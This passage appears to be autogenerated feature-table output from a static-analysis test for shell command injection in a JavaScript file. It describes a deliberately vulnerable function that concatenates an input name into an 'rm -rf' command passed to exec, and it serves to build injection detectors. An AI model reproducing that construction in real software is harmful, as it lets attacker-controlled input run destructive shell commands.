autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 = ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 = ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 = ... + name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 = ... + name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 = ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:21 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:28 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:28 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:28 | "rm -rf " + name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:28 | "rm -rf " + name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:13:57:28 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:25:57:28 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | cp | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | cp | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | this | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | this | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:58:1 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | 'arguments' object of function myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | 'arguments' object of function myExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | 'arguments' object of function myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | 'arguments' object of function myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | 'arguments' object of function myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | exceptional return of function myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | exceptional return of function myExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | exceptional return of function myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | exceptional return of function myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | exceptional return of function myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | functio ... md);\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | functio ... md);\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | functio ... md);\\n\\t} | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | functio ... md);\\n\\t} | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | functio ... md);\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | return of function myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | return of function myExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | return of function myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | return of function myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:2:60:2 | return of function myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:11:58:16 | myExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | contextSurroundingFunctionParameters | (cmd) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:58:18:58:20 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 